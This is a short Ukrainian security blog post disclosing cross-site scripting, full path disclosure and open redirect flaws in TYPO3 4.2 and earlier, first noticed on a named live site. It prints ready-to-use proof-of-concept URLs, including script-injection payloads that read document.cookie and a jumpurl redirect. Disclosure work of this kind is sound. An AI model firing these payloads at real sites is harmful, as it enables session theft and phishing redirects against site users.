Websecurity - Веб безпека

02.10.2009

У лютому, 06.02.2009, я знайшов Cross-Site Scripting, Full path disclosure та Redirector уразливості в TYPO3. Це популярна CMS. Дані уразливості я виявив на сайті viland.ua, де використовується дана система. Про що найближчим часом повідомлю розробникам.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

03.12.2009

XSS:

http://site/index.php?id=49&sword=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/nc/search-result/start/1.html?tx_ttproducts_pi1%5Bsword%5D=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Full path disclosure:

http://site/index.php?jumpurl=%0A1

Redirector:

http://site/index.php?jumpurl=http://websecurity.com.ua

Уразливі TYPO3 4.2 CMS та попередні версії.

This entry was posted on 19:13 03.12.2009 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.